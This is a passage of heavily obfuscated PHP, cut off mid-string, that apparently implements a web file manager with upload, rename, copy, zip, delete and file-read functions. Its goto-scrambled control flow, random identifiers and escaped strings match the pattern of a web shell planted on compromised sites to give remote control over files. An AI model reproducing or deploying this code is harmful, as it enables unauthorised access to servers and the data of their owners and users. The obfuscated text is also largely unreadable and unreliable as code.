I2HA3; ecKoc: echo $fZ6Lt[15]; goto X0vxt; AJYQv: if ($zaydo) { goto j6v0A; } goto v6h4e; ZDycd: echo "\40\x3c\57\x68\x34\x3e\15\12\11\x9\xd\xa\40\x20\x20\40\x20\x20\74\x2f\144\x69\166\76\15\xa\x20\x20\x20\x20\x20\x20\74\144\x69\166\40\143\x6c\141\x73\163\75\x22\155\157\144\141\154\55\x62\x6f\144\171\x22\x3e\15\12\11\x20\x20\74\x70\x3e"; goto bkfPt; W4r_V: echo $W7YOX[14]; goto A5znU; GeDwY: unset($nY7pD); goto lRwph; kXlQQ: echo "\47" . implode("\47\54\47", $XVQVq) . "\x27"; goto WK_z1; nhP3x: Tp6iE: goto oj0Xf; gQIDJ: echo "\51\40\x6e\157\55\162\x65\x70\145\141\164\40\154\145\x66\164\x20\143\145\156\164\145\162\73\160\141\144\x64\x69\x6e\147\72\40\65\x70\x78\x20\x30\x20\65\x70\x78\x20\x32\x35\x70\170\73\x6d\141\x72\147\151\x6e\x2d\154\145\x66\x74\x3a\x20\65\160\170\x3b\175\15\12\xd\xa\56\164\x61\x62\x6c\x65\x2c\x2e\142\x72\145\141\x64\x63\x72\x75\x6d\142\x2c\56\x6e\x61\166\x62\141\162\55\x64\x65\146\141\165\154\164\173\x62\157\x72\x64\145\x72\x3a\40\61\x70\170\40\x73\x6f\x6c\x69\x64\40\x23\104\x38\x44\x38\x44\x38\x3b\142\141\x63\153\x67\162\x6f\165\x6e\144\72\40\43\x66\x66\x66\x20\x6e\x6f\x6e\x65\40\162\145\x70\x65\x61\x74\40\x73\143\x72\x6f\154\154\x20\x30\x25\40\60\45\73\x7d\xd\xa\x2e\143\157\156\164\x61\x69\156\145\162\x5f\60\x31\x7b\x62\x6f\x72\144\x65\x72\72\x20\61\160\170\x20\x73\x6f\x6c\x69\x64\40\43\104\70\x44\x38\104\x38\x3b\x62\x61\143\153\147\162\157\165\156\x64\x3a\x20\x23\146\146\x66\x20\156\157\156\145\40\162\x65\x70\x65\x61\x74\x20\163\x63\162\157\x6c\154\40\x30\45\40\60\x25\73\160\x61\144\144\151\156\147\x3a\40\x32\65\x70\x78\x3b\x6d\141\x72\x67\151\x6e\x2d\x62\157\164\x74\x6f\x6d\x3a\62\60\x70\x78\x3b\x7d\xd\12\x2e\x4c\157\x61\x64\151\x6e\x67\173\142\x61\x63\153\x67\162\x6f\165\156\144\72\x75\162\154\x28"; goto ecKoc; NvRgr: $W7YOX[0] = "\145\x6e"; goto D1cpX; Tasa2: unset($xiRE_); goto Mmmw0; fLJ9Z: if (!(is_array($_FILES["\x69\x6e\x70\165\164\106\151\x6c\x65\125\160\x6c\x6f\x61\x64"]["\x6e\x61\155\145"]) || is_object($_FILES["\151\156\160\x75\x74\106\x69\154\145\125\x70\154\157\141\x64"]["\x6e\141\155\x65"]))) { goto TJK48; } goto Gku0R; LdStr: echo $W7YOX[35]; goto r3X_T; bkLyZ: echo "\40\x20\40\x20\40\x20\x3c\154\151\x3e\74\141\x20\150\162\145\x66\75\x22\77\154\157\x67\157\165\164\x22\x3e\74\x73\x70\141\156\x20\143\154\141\x73\163\75\x22\x4c\x6f\147\157\165\x74\x49\x63\x6f\156\x22\x3e\x3c\57\163\160\x61\156\x3e\x20"; goto WkR3k; R4wCj: echo "\47\54\xd\xa\x20\x20\40\x20\40\40\40\x20\x20\40\40\x20\x20\x20\40\40\x20\x20\x20\x20\x6f\156\120\141\147\145\103\x6c\x69\143\153\x3a\40\x66\165\x6e\x63\x74\151\x6f\x6e\40\50\x65\166\145\x6e\164\54\x20\x70\141\147\145\x29\x20\173\xd\xa\11\11\x20\x20\x20\x20\40\x20\x20\40\40\40\x20\x20\x69\146\x28\x74\171\160\x65\75\x3d\x30\x29\40\x20\173\40\11\xd\12\x9\x9\11\40\40\x20\40\40\40\40\x20\40\40\x24\x28\42\x23\x63\157\x6e\164\145\156\x74\42\51\x2e\x68\164\155\154\50\x4c\x6f\x61\144\151\x6e\147\x48\164\x6d\x6c\x29\x3b\xd\12\11\x9\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\x20\x20\40\44\56\147\145\x74\x4a\x53\x4f\x4e\50\42\77\x64\151\162\75\x22\53\x64\141\164\141\x2e\144\x69\162\53\x22\x26\164\141\x62\x6c\145\46\x70\141\x67\x65\75\x22\53\160\141\x67\145\53\42\x26\141\154\145\x72\164\75\x22\53\x64\x61\x74\x61\56\141\x6c\145\162\164\x2c\40\146\165\156\143\x74\151\x6f\156\x28\x64\x61\x74\x61\51\x7b\x24\x28\42\43\x63\157\x6e\x74\x65\156\x74\42\x29\56\x68\x74\155\x6c\50\x64\x61\x74\x61\x2e\x74\141\x62\x6c\145\x29\73\x20\44\50\x22\x23\x52\145\163\x75\x6c\x74\x22\x29\56\x68\x74\x6d\x6c\50\144\141\x74\x61\x2e\x74\x61\x62\x6c\x65\51\73\40\44\50\47\x23\x62\162\145\x61\144\143\162\x75\155\142\x27\x29\x2e\x68\164\155\154\50\144\x61\164\x61\x2e\144\x69\162\110\164\155\154\x29\x3b\x20\40\x24\x28\47\x23\141\x6c\x65\162\x74\47\x29\x2e\x68\x74\x6d\x6c\50\144\141\164\x61\x2e\x61\x6c\x65\x72\x74\x29\x3b\175\x29\x3b\175\15\12\11\x9\x20\x20\x20\40\40\40\x20\x20\x20\x20\40\x20\x7d\40\x20\40\40\40\x20\x20\40\xd\xa\x9\x9\40\40\x20\x20\40\x20\x20\40\x7d\51\x3b\xd\xa\11\x9\11\40\40\x20\40\x20\40\x7d\x29\x3b\11\15\12\x9\x9\11\11\x20\40\xd\12\x9\11\11\175\73\15\12\11\x9\x9\15\xa\11\x9\11\146\x75\x6e\143\164\x69\x6f\x6e\40\123\x65\x61\x72\143\150\50\x29\15\12\11\11\x9\x7b\15\12\x9\x9\11\x20\x20\x20\x20\147\145\164\x43\157\x6e\164\x65\x6e\164\50\42\x64\x69\162\75\42\53\x24\x28\x27\x23\144\x69\162\x49\x6e\x70\165\164\123\x65\x61\162\x63\x68\47\51\x2e\166\141\154\50\51\53\47\x26\163\x65\x61\x72\143\150\75\x27\x2b\44\50\47\43\151\x6e\160\x75\x74\123\x65\141\x72\x63\x68\x27\x29\x2e\166\x61\x6c\x28\x29\54\x31\51\11\15\xa\11\11\11\x7d\xd\12\11\x9\x9\15\xa\xd\12\x9\11\x9\xd\xa\x9\11\x9\40\x66\165\x6e\143\x74\x69\x6f\x6e\40\123\145\164\x52\x65\x6e\x61\155\145\115\157\x64\x61\x6c\x61\164\164\162\x28\144\151\x72\x29\15\xa\11\x9\x9\40\173\xd\12\x9\x9\11\11\57\x2f\x76\141\162\x20\x66\x69\154\145\x6e\x61\x6d\x65\x3d\x20\x53\160\154\x69\x74\x46\151\154\x65\116\x61\x6d\x65\50\x64\x69\162\x2c\x22\x2f\42\x29\x2e\x73\160\154\151\x74\x28\42\46\42\51\133\x30\135\73\xd\xa\x9\11\11\x9\144\151\x72\x20\75\x20\162\145\160\x6c\x61\x63\x65\x5f\144\151\x72\x28\144\151\162\51\x3b\x20\xd\12\x9\11\11\11\x76\141\162\x20\146\x69\x6c\145\x6e\x61\155\145\x20\75\x20\123\160\154\151\x74\106\151\x6c\x65\116\x61\155\145\50\x64\151\162\x2e\x73\x70\154\x69\x74\50\x22\x26\x22\x29\133\60\135\54\42\x2f\x22\x29\73\x20\xd\12\x9\x9\x9\11\44\50\x27\43\x72\x65\156\x61\155\145\111\156\x70\x75\164\x27\x29\56\x76\141\x6c\x28\x66\151\x6c\145\156\x61\x6d\x65\51\x3b\44\50\47\43\x72\x65\156\x61\x6d\145\x44\151\162\47\x29\x2e\x76\141\x6c\50\x64\x69\162\51\x3b\x24\50\47\43\x52\145\x6e\141\155\145\146\151\x6c\x65\116\141\x6d\145\47\x29\56\x68\x74\155\x6c\x28\146\151\x6c\145\x6e\x61\x6d\x65\51\x3b\15\xa\11\x9\11\x9\44\50\47\x23\123\150\157\167\x46\x69\154\x65\x27\x29\56\155\x6f\x64\x61\154\50\47\150\151\144\145\x27\x29\x3b\11\15\xa\x9\x9\11\x9\x24\x28\47\x23\x52\x65\x6e\141\155\x65\x27\x29\x2e\x6d\157\x64\141\x6c\x28\x27\163\150\x6f\x77\x27\51\x3b\11\xd\xa\x9\x9\x9\x9\x24\x28\x20\42\x23\162\145\156\141\x6d\145\111\x6e\x70\165\164\42\40\x29\x2e\146\x6f\143\x75\163\x28\x29\x3b\11\11\x9\11\x9\15\12\x9\11\11\40\175\73\15\xa\11\11\x9\40\xd\xa\x9\11\x9\40\15\12\11\11\11\40\40\x66\x75\x6e\x63\164\151\x6f\156\40\123\145\x74\x4e\145\x77\x46\157\x6c\x64\x65\x72\115\157\144\141\x6c\x61\164\164\162\x28\51\xd\12\x9\11\11\x20\x7b\xd\12\11\11\x9\x9\x64\151\x72\40\x3d\40\44\x28\47\x23\x64\151\x72\145\143\164\157\x72\x79\47\51\x2e\166\141\154\50\x29\73\xd\12\x9\x9\11\11\144\x69\162\40\75\40\x72\145\x70\x6c\x61\x63\145\137\x64\151\x72\50\144\151\x72\51\x3b\x20\15\12\11\11\x9\x9\x24\x28\47\x23\x4e\145\x77\106\157\x6c\144\145\x72\x44\x69\x72\47\51\56\166\x61\154\x28\x64\x69\x72\x29\73\xd\xa\x9\x9\11\x9\44\50\x27\x23\x53\x68\157\x77\106\x69\154\x65\47\x29\x2e\155\x6f\x64\141\x6c\50\47\150\x69\x64\145\47\51\73\x9\15\12\11\x9\11\x9\x24\50\x27\43\116\x65\x77\x46\x6f\x6c\x64\145\162\x27\51\56\x6d\x6f\144\141\154\x28\47\x73\x68\x6f\x77\x27\51\73\x9\15\xa\11\11\11\x9\44\x28\40\x22\x23\x4e\145\167\x46\x6f\x6c\x64\145\162\x44\151\162\42\x20\x29\x2e\x66\157\143\x75\163\x28\51\x3b\11\11\x9\x9\x9\15\xa\11\x9\11\x20\x7d\x3b\xd\12\11\x9\x9\40\15\xa\x9\x9\11\x20\146\165\156\143\x74\x69\157\x6e\40\x53\x65\164\125\160\x6c\157\141\x64\x46\151\154\145\x4d\157\144\141\154\x61\164\x74\162\x28\x29\xd\12\x9\x9\11\40\x7b\xd\12\11\11\11\x9\144\151\162\40\x3d\x20\x24\50\x27\43\144\x69\162\x65\143\164\157\x72\x79\x27\x29\56\166\141\154\x28\51\73\xd\12\11\11\11\x9\x64\151\162\40\75\40\162\x65\x70\x6c\x61\143\x65\x5f\x64\151\162\x28\144\151\162\x29\73\x20\xd\12\11\11\x9\x9\x24\x28\47\43\125\x70\154\x6f\141\144\106\151\154\145\104\151\162\47\x29\56\x76\x61\154\50\x64\151\x72\51\x3b\xd\xa\11\x9\x9\x9\x24\50\x27\43\x69\x6e\x70\x75\164\x46\x69\154\145\125\x70\x6c\x6f\x61\144\47\51\56\x76\141\x6c\50\47\x27\51\73\15\12\11\x9\11\x9\x24\50\x22\x23\x55\160\x6c\x6f\x61\x64\106\x69\154\x65\x53\x69\172\x65\x22\x29\x2e\x68\x74\x6d\154\x28\x27\x27\x29\73\11\15\xa\x9\11\11\11\x24\50\x27\x23\123\150\157\x77\x46\x69\154\145\x27\x29\x2e\155\x6f\x64\x61\154\50\47\150\151\x64\x65\47\x29\73\11\15\12\x9\x9\x9\11\x24\50\x22\43\x46\151\x6c\x65\x55\x70\x6c\157\x61\144\x42\164\156\x22\x29\x2e\x61\164\x74\x72\50\42\144\x69\163\141\142\154\145\x64\42\x2c\40\42\x64\x69\163\141\142\154\145\x64\42\51\73\15\xa\x9\11\x9\11\x24\50\47\x23\x6d\x61\x78\x46\151\x6c\x65\x53\151\x7a\x65\x27\x29\56\150\x74\155\x6c\x28\x20\x66\157\162\x6d\x61\164\x46\x69\x6c\x65\x53\x69\x7a\x65\x28\x6d\x61\170\x46\x69\x6c\x65\123\x69\172\x65\51\40\x29\73\11\15\xa\x9\x9\x9\x9\44\50\47\43\x46\x69\154\x65\x55\x70\154\157\141\144\x4c\141\142\145\x6c\x73\x75\x63\143\x65\x73\163\x27\x29\x2e\150\164\155\x6c\50\47\47\x29\x3b\15\12\11\11\11\11\44\50\47\x23\125\160\x6c\x6f\x61\x64\x46\151\154\x65\x27\51\x2e\155\157\144\x61\154\x28\x27\x73\150\157\167\47\x29\x3b\x9\11\11\11\15\xa\11\11\x9\40\x7d\x3b\15\xa\x9\x9\11\x20\xd\xa\11\x9\11\x20\40\146\x75\156\143\x74\x69\157\x6e\40\x53\145\x74\103\x6f\x70\x79\x46\x69\x6c\x65\x4d\157\144\x61\x6c\141\x74\x74\x72\x28\x64\151\x72\x29\15\xa\x9\x9\x9\40\173\xd\xa\11\x9\15\12\11\11\x9\x9\144\151\162\x20\75\x20\162\x65\x70\x6c\x61\x63\x65\x5f\x64\x69\x72\50\144\x69\162\x29\73\40\15\12\x9\11\11\x9\57\57\x76\141\162\x20\x66\x69\x6c\x65\x6e\x61\155\145\40\x3d\x20\123\160\x6c\151\x74\106\151\154\x65\x4e\141\x6d\145\50\x64\151\x72\x2e\163\x70\154\x69\164\x28\x22\x26\42\51\133\60\x5d\x2c\42\x2f\x22\x29\x3b\x20\15\xa\11\x9\11\11\x76\x61\x72\x20\146\151\154\x65\156\x61\x6d\x65\40\75\40\144\x69\x72\56\x73\160\x6c\151\x74\x28\x22\46\42\51\133\x30\x5d\x3b\40\15\xa\11\x9\11\11\57\x2f\166\x61\x72\x20\x66\x69\154\145\156\x61\x6d\x65\x20\x3d\x20\146\x69\154\145\x6e\x61\155\x65\56\163\x70\x6c\x69\164\x28\42\57\x22\x29\x5b\146\x69\154\145\x6e\x61\155\145\x2e\163\x70\154\151\164\x28\42\x2f\42\x29\56\154\145\156\x67\164\150\55\61\135\x2b\x27\57\x27\x3b\x20\15\12\x9\11\11\x9\x24\50\47\43\106\x72\x6f\155\x46\157\154\144\x65\x72\104\x69\162\47\x29\56\x76\x61\154\x28\x64\151\162\x29\x3b\xd\12\x9\11\11\x9\44\50\47\43\124\157\x46\x6f\x6c\144\x65\162\111\156\x70\x75\x74\47\51\x2e\166\x61\154\50\x66\151\154\x65\x6e\141\x6d\x65\51\x3b\40\x2f\x2f\146\151\x6c\145\156\141\x6d\145\x2e\163\154\151\143\145\x28\x20\60\x2c\x20\146\151\154\145\156\x61\155\145\x2e\154\141\163\x74\111\156\x64\145\170\x4f\146\x28\42\57\x22\x29\x29\x2b\x27\57\x27\xd\12\x9\x9\x9\x9\x24\50\47\43\123\150\x6f\167\106\x69\x6c\145\47\x29\x2e\x6d\x6f\144\x61\x6c\50\47\x68\x69\144\145\47\51\73\11\15\12\x9\x9\x9\x9\44\50\x27\x23\x43\157\x70\x79\106\157\x6c\x64\145\162\47\x29\56\155\157\144\x61\154\x28\x27\163\150\x6f\x77\x27\51\73\x9\x9\15\12\11\x9\x9\x9\x24\50\x20\42\43\124\x6f\x46\x6f\x6c\x64\145\x72\111\156\160\165\164\42\x20\51\x2e\x66\157\143\x75\x73\50\51\x3b\11\11\11\x9\15\12\x9\11\11\40\175\73\xd\12\x9\11\11\x20\xd\xa\11\11\11\40\146\165\156\x63\164\151\x6f\156\40\123\x65\164\132\x69\160\106\151\x6c\x65\115\x6f\x64\141\x6c\x61\x74\x74\x72\x28\x64\151\162\51\15\12\11\x9\x9\40\173\15\12\11\11\xd\12\11\11\x9\11\x64\151\x72\40\75\40\x72\145\160\x6c\141\x63\x65\x5f\x64\x69\162\x28\144\151\162\x29\x3b\x20\15\12\x9\x9\x9\11\57\57\x76\141\x72\x20\146\151\154\145\156\141\x6d\x65\40\x3d\40\73\x20\x9\11\x9\15\xa\11\11\11\11\x24\x28\x27\43\132\x69\x70\144\x69\162\47\x29\56\x76\141\x6c\50\144\x69\x72\51\x3b\xd\12\x9\x9\11\11\166\x61\162\x20\x66\151\154\x65\x6e\141\x6d\145\40\x3d\40\x64\151\162\56\163\160\x6c\x69\164\x28\x22\x26\42\x29\133\60\x5d\x3b\40\xd\xa\40\40\x20\40\40\40\40\40\40\40\x20\40\40\40\x20\x20\x24\x28\47\x23\132\151\160\146\151\154\x65\116\141\155\145\47\51\56\x68\164\155\154\50\x53\160\x6c\151\x74\106\151\x6c\145\116\141\x6d\x65\50\144\151\162\x2e\x73\x70\x6c\151\x74\50\x22\46\42\51\133\60\x5d\x2c\42\57\42\51\x29\73\15\xa\x9\11\11\11\44\x28\47\x23\106\157\x6c\x64\x65\x72\x55\156\x7a\x69\160\111\x6e\160\165\164\47\x29\x2e\x76\x61\154\x28\146\x69\x6c\x65\156\x61\x6d\x65\56\163\x6c\151\143\x65\x28\40\60\x2c\x20\146\x69\x6c\145\x6e\x61\x6d\145\x2e\x6c\141\x73\x74\x49\156\144\145\x78\x4f\x66\x28\x22\57\x22\x29\x29\x2b\x27\x2f\x27\x29\73\xd\12\x9\x9\11\11\x24\50\x27\x23\123\150\x6f\x77\106\151\154\x65\47\51\x2e\155\157\x64\141\x6c\x28\x27\150\151\x64\x65\47\x29\73\11\xd\12\x9\x9\11\11\x24\x28\47\43\x5a\x69\160\x46\x69\154\x65\x27\51\x2e\x6d\x6f\144\x61\x6c\50\47\x73\150\157\x77\47\x29\73\x9\x9\15\xa\x9\x9\11\x9\x24\50\x20\42\43\106\x6f\154\144\145\x72\x55\x6e\172\151\160\x49\x6e\160\x75\164\42\x20\x29\56\146\157\x63\x75\163\50\51\73\11\11\x9\11\xd\12\x9\x9\x9\40\x7d\x3b\15\12\11\11\11\40\xd\12\x9\x9\11\40\xd\xa\11\x9\x9\x20\40\xd\xa\x9\11\x9\x20\15\12\x9\x9\x9\x20\146\x75\156\143\164\x69\x6f\156\40\x53\x65\164\122\x65\x6d\157\166\x65\115\157\144\x61\x6c\141\x74\x74\x72\x28\144\x69\162\x29\xd\xa\x9\x9\11\x20\x7b\15\12\11\11\11\11\x64\x69\162\x20\75\x20\x72\x65\160\x6c\141\x63\x65\137\x64\151\162\x28\144\151\x72\51\73\40\xd\12\x9\x20\40\40\40\40\x20\x20\40\40\x20\x20\40\x76\x61\x72\40\x66\x69\154\x65\x6e\141\x6d\145\40\75\x20\x53\160\154\x69\x74\x46\x69\x6c\x65\116\x61\155\x65\x28\144\151\x72\x2e\x73\x70\154\151\164\x28\42\46\42\x29\133\60\x5d\x2c\42\x2f\x22\x29\73\x20\15\12\x9\11\11\x9\x24\50\47\x23\122\145\155\157\166\x65\x49\156\x70\x75\164\x27\51\x2e\x76\x61\154\x28\146\x69\x6c\145\156\141\155\x65\51\73\44\x28\x27\43\x52\x65\x6d\x6f\x76\145\144\151\x72\47\51\56\166\141\x6c\x28\144\151\x72\x29\73\44\50\x27\43\x52\x65\155\x6f\166\145\x66\x69\154\x65\x4e\x61\155\x65\x27\51\56\x68\164\155\x6c\x28\146\151\x6c\x65\156\141\x6d\x65\51\x3b\xd\xa\11\11\x9\x9\x24\x28\x27\43\x53\x68\157\167\106\151\154\x65\47\x29\x2e\155\157\x64\141\154\x28\x27\150\x69\144\145\x27\x29\x3b\11\xd\12\11\x9\11\11\x24\50\47\43\122\145\155\157\166\x65\x27\51\x2e\155\157\x64\141\x6c\50\47\x73\150\157\x77\x27\x29\73\x9\x9\x9\x9\15\12\11\11\11\x20\175\x3b\xd\xa\xd\xa\11\x20\x20\40\x20\40\40\x20\40\146\165\156\x63\164\x69\x6f\156\40\147\145\164\x45\170\x74\x28\x66\151\x6c\x65\x6e\x61\155\145\51\15\xa\11\40\x20\40\x20\40\x20\x20\40\173\xd\xa\x9\x9\x9\x20\x20\162\x65\164\x75\x72\156\x20\x66\151\154\145\x6e\x61\155\x65\x2e\x73\x75\142\x73\164\162\x28\x66\151\x6c\x65\x6e\x61\155\x65\56\x6c\141\163\x74\111\156\x64\x65\170\117\146\50\47\x2e\47\51\x2b\61\51\56\x74\157\x4c\157\167\145\x72\103\x61\x73\145\50\x29\73\xd\12\x9\x9\x20\40\40\x20\x20\40\57\57\162\x65\164\x75\x72\x6e\40\x66\x69\x6c\145\x6e\x61\x6d\145\x2e\x73\x70\x6c\x69\164\50\47\56\x27\x29\x2e\x70\x6f\x70\50\x29\x3b\xd\xa\x9\11\40\x20\40\x20\175\15\xa\x9\11\x9\xd\12\x9\11\x9\146\x75\156\x63\164\x69\x6f\x6e\40\123\x70\154\151\164\106\151\x6c\x65\116\x61\x6d\145\50\x64\151\x72\x2c\163\160\154\151\164\51\xd\xa\x9\11\11\x7b\15\12\x9\11\11\11\166\x61\x72\x20\146\x69\154\145\137\x6e\x61\x6d\x65\x5f\141\x72\x72\141\x79\40\x3d\40\x64\x69\162\56\x73\160\154\151\164\x28\x73\x70\154\151\164\51\73\xd\xa\11\11\11\11\x72\x65\x74\x75\162\156\40\x66\x69\x6c\145\x5f\156\141\155\145\x5f\x61\162\162\x61\x79\x5b\x66\x69\x6c\145\137\156\x61\155\145\x5f\141\162\162\x61\x79\56\154\145\156\x67\x74\150\40\55\x20\x31\135\73\xd\xa\11\11\x9\x7d\15\12\x9\xd\12\x9\11\11\40\x20\x66\165\156\x63\164\x69\157\156\40\x53\x65\x74\123\150\157\x77\106\151\x6c\x65\115\x6f\144\x61\154\x61\x74\x74\x72\50\x64\151\x72\x29\xd\xa\x9\11\x9\40\x7b\xd\xa\11\x9\x9\11\40\x24\50\x22\x23\x46\151\154\145\x57\x72\151\x74\x65\x42\x74\x6e\42\x29\56\150\151\x64\145\50\51\73\xd\xa\x9\11\11\x9\40\x64\151\162\40\75\40\162\x65\160\154\141\143\x65\137\144\151\162\50\x64\151\x72\x29\73\40\xd\12\x9\x9\11\11\x20\x69\146\40\x28\144\x69\162\56\x69\x6e\144\x65\170\117\146\x28\42\43\x22\51\x20\x21\75\55\x31\51\x20\xd\xa\x9\x9\11\11\x9\40\x76\141\x72\x20\146\151\x6c\x65\x6e\141\x6d\145\40\75\40\x53\x70\154\151\x74\106\151\154\145\x4e\141\x6d\145\x28\144\x69\x72\54\42\43\42\x29\73\15\xa\x9\11\x9\11\x20\145\154\163\145\xd\xa\x9\11\x9\11\11\40\x76\141\162\x20\x66\x69\x6c\x65\x6e\141\x6d\145\x20\x3d\x20\x53\160\x6c\151\164\106\151\154\145\x4e\141\155\145\50\144\151\162\x2c\x22\x2f\x22\51\73\xd\xa\15\12\40\40\x20\40\40\x20\x20\40\x20\40\x20\x20\40\40\40\40\x24\50\x27\43\146\151\x6c\145\x6e\141\x6d\x65\x49\156\160\165\x74\x27\51\x2e\166\141\x6c\x28\146\151\x6c\145\156\141\155\x65\51\73\xd\xa\11\11\11\11\x2f\57\40\x76\141\x72\x20\x64\151\162\x20\x3d\40\146\x69\154\145\x5f\156\x61\155\145\137\141\x72\162\141\171\133\x66\x69\x6c\x65\x5f\156\x61\x6d\145\x5f\x61\x72\162\141\171\56\154\145\x6e\147\164\150\40\x2d\x20\x32\x5d\x3b\15\12\11\11\x9\11\x24\x28\47\x2e\x6e\x61\166\x2d\164\x61\142\x73\x20\141\x5b\x68\x72\x65\x66\75\42\x23\x5f\x62\162\157\167\x73\145\42\47\x29\56\x74\x61\142\50\x27\163\150\157\167\x27\51\73\xd\xa\x9\x9\11\11\44\x28\42\43\154\x69\163\x74\106\157\154\x64\x65\162\x46\x69\x6c\145\x73\x22\51\x2e\150\164\x6d\154\50\x27\47\51\x3b\xd\12\40\x20\40\x20\40\x20\40\40\x20\40\40\40\x20\x20\x20\40\x24\50\42\43\x48\x72\x65\x66\x42\162\x6f\x77\163\x65\42\51\56\x68\164\155\154\x28\47"; goto gDRmd; N6pww: unset($r2sBB); goto owM_t; vST04: if (!(isset($_GET["\x72\x65\141\x64"]) && $EoW3a && kD9YA())) { goto mXrhI; } goto Cvezf; mJsGm: if (!(!yyLNi() && $TG6CH)) { goto XTEPS; } goto cZTDT; q0sPK: $W7YOX[35] = "\114\x6f\x61\x64\x69\156\x67\40\x2e\56\x2e"; goto wS5WA; hsxqr: unset($xiRE_); goto q5NXT; jaEbi: unset($W7YOX); goto lgbUo; Rhgqw: $TG6CH = true; goto UCzw4; ADFnx: $W7YOX[20] = "\x52\145\x6e\141\155\x65"; goto cp5VK; rGgXy: echo "\x27\x29\73\xd\12\40\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\175\15\12\x9\x9\11\xd\xa\x9\11\x9\15\12\x20\40\40\x20\x20\x20\40\x20\x7d\x29\x3b\15\12\40\40\x20\40\175\51\51\x3b\15\xa\15\xa\x9\x66\x75\156\143\x74\x69\157\x6e\x20\146\x6f\x72\155\141\164\106\151\x6c\x65\x53\151\x7a\145\x28\x62\x79\164\x65\163\x29\40\x7b\xd\xa\x9\11\x9\x9\xd\12\x9\x9\11\11\146\x6f\162\x28\166\x61\162\x20\x70\157\x73\40\75\40\x30\x3b\142\171\164\145\x73\40\x3e\75\40\61\60\x30\60\73\40\160\x6f\x73\x2b\53\54\142\171\164\x65\163\x20\x2f\x3d\40\x31\x30\x32\64\51\73\xd\12\11\x9\x9\x9\166\141\162\x20\144\x20\x3d\40\115\141\x74\x68\x2e\x72\157\x75\x6e\x64\x28\142\171\164\145\163\52\x31\60\51\73\xd\xa\x9\11\11\11\162\x65\x74\165\162\x6e\x20\x70\157\x73\40\x3f\x20\133\160\141\162\x73\145\x49\x6e\x74\50\x64\x2f\61\x30\51\54\x22\56\x22\x2c\144\x25\61\x30\54\x22\40\x22\x2c\165\156\151\x74\163\x5b\160\157\x73\x5d\135\x2e\152\157\151\156\50\47\x27\51\40\x3a\x20\142\171\x74\145\163\x20\x2b\x20\165\156\x69\x74\x73\133\x30\135\x3b\15\12\11\x9\x9\x7d\15\12\15\12\xd\12\11\x9\40\40\x20\40\166\141\162\x20\x4c\x6f\x61\x64\x69\156\x67\110\164\x6d\x6c\75\47\74\x64\x69\166\x20\x63\x6c\141\x73\x73\75\42\x63\157\156\164\141\151\156\145\162\137\60\61\42\x3e\74\x63\x65\x6e\x74\x65\x72\x3e\x3c\163\x70\x61\x6e\x20\143\154\141\x73\163\x3d\42\x4c\157\x61\144\151\156\147\42\76\x3c\x2f\163\x70\x61\156\76\74\x62\x72\76\74\x62\162\76"; goto LdStr; L273T: $W7YOX[26] = "\x4c\157\x67\157\x75\164"; goto MbNZx; uk5Vk: echo "\xe2\x86\x92"; goto Va1oN; AyHjK: $nY7pD = "\x3c\x64\x69\x76\40\143\x6c\x61\163\x73\75\x22\x74\141\142\154\x65\55\162\x65\x73\x70\157\x6e\x73\x69\166\145\x22\76\x3c\x74\x61\x62\154\x65\40\143\154\x61\x73\163\75\42\x74\141\x62\x6c\145\x20\x74\141\x62\154\145\x2d\x68\x6f\x76\x65\x72\40" . $XMJqR . "\x22\76\x3c\x74\x68\x65\x61\144\76\x3c\164\x72\x3e"; goto XkGM_; qnzY3: unset($TG6CH); goto mvEEN; tkhKS: die(iwwpp($_GET["\162\x65\141\x64"])); goto sJbql; b5SlW: unset($_ENV); goto VHrtv; dMuQm: unset($OQWkJ); goto Tasa2; D1cpX: $W7YOX[1] = "\122\145\155\x6f\x76\145"; goto VaIXD; bsUq7: echo $W7YOX[15]; goto KKoyg; DXD1A: CfySF: goto ECXX5; GmUZH: $RYKLz = array_map("\x73\164\162\164\x6f\x6c\157\x77\x65\x72", $RYKLz); goto ixJCU; Kbx8s: d30iw: goto kUw1z; DIxId: m05f7: goto QvPLY; zSvwq: xxr19: goto hdWCx; GbOhf: i2j9I: goto tlXWr; DpNlm: if (!$TG6CH) { goto LpfO9; } goto bkLyZ; xOxff: echo "\42\76\x3c\x2f\163\160\x61\156\x3e\40\15\12\11\x20\x20\x20\40\74\x62\165\164\164\x6f\156\x20\x20\164\x79\x70\x65\x3d\42\142\x75\164\164\x6f\156\42\x20\x63\x6c\141\163\163\75\42\x62\x74\156\40\142\x74\156\x2d\x73\165\143\143\x65\163\x73\42\40\x20\157\156\143\154\x69\x63\x6b\75\x22\162\145\x6e\x61\155\x65\x41\x6e\x64\103\157\x6e\164\x65\156\164\x28\51\42\76"; goto dKjsa; pUbih: uqZT3: goto V4AC1; XoGWo: echo "\74\x2f\142\165\x74\164\157\156\x3e\15\xa\11\x9\40\xd\xa\11\40\x3c\x2f\x64\x69\x76\76\15\12\x20\40\40\40\74\57\x64\x69\166\76\xd\xa\15\xa\x20\40\x3c\57\144\x69\x76\x3e\xd\xa\x3c\57\x64\x69\x76\76\x9\15\xa\15\12\xd\12\x3c\x21\55\55\40\115\157\x64\141\x6c\x20\125\x70\154\157\x61\144\106\x69\x6c\x65\40\55\55\x3e\xd\12\x3c\144\151\166\x20\151\144\75\x22\125\160\x6c\x6f\141\x64\106\x69\x6c\145\x22\40\x63\x6c\x61\163\x73\x3d\x22\x6d\x6f\x64\x61\154\x20\x66\141\144\x65\42\x20\x72\157\154\145\x3d\x22\x64\151\141\x6c\157\x67\x22\76\15\xa\40\x20\x3c\x64\151\x76\40\143\x6c\141\x73\x73\75\x22\x6d\x6f\x64\x61\154\55\x64\x69\141\x6c\x6f\x67\x22\76\xd\12\xd\12\x20\x20\x20\40\x3c\x21\55\55\40\x4d\157\144\141\x6c\x20\x63\x6f\156\164\x65\x6e\164\x2d\x2d\x3e\xd\12\40\40\x20\40\74\144\151\x76\x20\x63\154\x61\163\163\x3d\x22\x6d\157\144\141\154\x2d\143\x6f\x6e\x74\x65\156\164\x22\76\15\xa\11\40\15\xa\x20\x20\40\x20\40\40\x3c\144\x69\166\x20\x63\154\x61\163\163\75\x22\155\x6f\144\x61\x6c\x2d\150\145\x61\144\x65\162\x22\x3e\15\xa\40\x20\40\x20\x20\40\x20\40\x3c\142\x75\164\x74\157\x6e\40\x74\171\x70\145\x3d\42\142\165\164\164\x6f\x6e\42\40\143\x6c\x61\163\x73\x3d\42\143\x6c\x6f\x73\x65\x22\x20\144\x61\x74\x61\55\144\x69\163\x6d\151\x73\x73\